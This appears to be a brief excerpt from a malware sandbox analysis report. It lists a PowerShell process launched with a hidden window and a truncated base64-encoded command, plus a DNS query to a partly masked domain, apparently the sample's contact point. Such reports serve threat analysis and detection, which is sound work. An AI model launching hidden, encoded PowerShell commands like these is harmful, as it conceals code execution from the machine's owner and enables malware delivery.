Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WinDowsTyle hidden -e IAAoACgAIgB7ADIANwB9AHsAMQAxADAAfQB7ADEAMQAxAH0AewA1ADgAfQB7ADUANAB9AHsAOQA2AH0AewAyADkAfQB7ADEAOAB9AHsANwAxAH0AewA3ADkAfQB7ADEAMAA3AH0AewA4ADIAfQB7ADgAOAB9AHsANgAwAH0Aew...
- DNS ASK bn###wehquw.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WinDowsTyle hidden -e IAAoACgAIgB7ADIANwB9AHsAMQAxADAAfQB7ADEAMQAxAH0AewA1ADgAfQB7ADUANAB9AHsAOQA2AH0AewAyADkAfQB7ADEAOAB9AHsANwAxAH0AewA3ADkAfQB7ADEAMAA3AH0AewA4ADIAfQB7ADgAOAB9AHsANgAwAH0Aew...' (with hidden window)